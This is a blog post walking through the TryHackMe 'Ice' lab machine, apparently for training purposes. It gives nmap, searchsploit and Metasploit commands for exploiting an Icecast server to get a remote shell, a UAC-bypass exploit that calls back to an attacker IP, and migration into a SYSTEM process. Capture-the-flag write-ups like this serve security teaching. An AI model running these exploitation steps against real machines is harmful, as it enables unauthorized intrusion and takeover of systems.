Courses
Blogs / TryHackMe – Ice Writeup

TryHackMe – Ice Writeup

clock-img 17 Feb, 2022 
cat-img TryHackMe Writeups
Ice-Writeup

Table Of Contents

1. TryHackMe – Ice Writeup

2. Connecting to HTB Vpn

3. Scanning

4. Enumeration

5. Gaining Access

6. Privilege Escalation

TryHackMe – Ice Writeup

Ice is a beginner level windows machine on tryhackme. The machine runs an Icecast Media Server on one of the ports. We exploit this service to gain a remote shell on the machine. The privilege escalation is done with bypassuas_eventvwr exploit and by exploiting the SeTakeOwnershipPrivilege to gain system on the remote machine

Ice Writeup

Connecting to HTB Vpn:

1] First download the vpn file from the access page of tryhackme

2] Open the .ovpn file in your terminal with the following command

openvpn yourname.ovpn

3] Now as the “Initialization Completed” message appears on the screen you are connected to the hackthebox network

4] You can access the machine at the given ip

Scanning:

1] First let’s do a nmap scan on our target at 10.10.219.165

nmap -sV -A -p- 10.10.219.165

-sV : to get the service versions on each port
-A : to get information such as os details, traceroutes, ports etc
-p- : to scan all 65535 ports

We get the following details from our scan

Enumeration:

2] We can see an open port running icecast streaming media server, so first let’s search for any exploits related to this service using searchsploit

searchsploit icecast

TryHackMe – Ice Writeup

Gaining Access:

3] Since there is a metasploit module, first let’s try that

msfconsole

search icecast

TryHackMe – Ice Writeup : Gaining Access

4] Let’s try this exploit

use 0
set rhosts 10.10.219.165
exploit

Certified Ethical Hacking

Enroll Now

Privilege Escalation:

5] Now lets background this session(ctrl+z) and try to escalate our privileges using the local exploit suggester module in metasploit

search local_exploit_suggester

use 0
set session 2
exploit

6] Let’s try the first exploit and if it doesn’t work then the rest

use exploit/windows/local/bypassuac_eventvwr
set session 2
set lhost 10.10.13.20
exploit

7] Now let’s check what all privileges this user has

getprivs

8] We have SeTakeOwnership privilege, so let’s migrate to any process running as System

ps
migrate 816

9] Now we are System on the machine

Don’t forget to check out our latest Blogs – HackTheBox – Irked Writeup

Courses

Training Calender

WhatsApp

Phone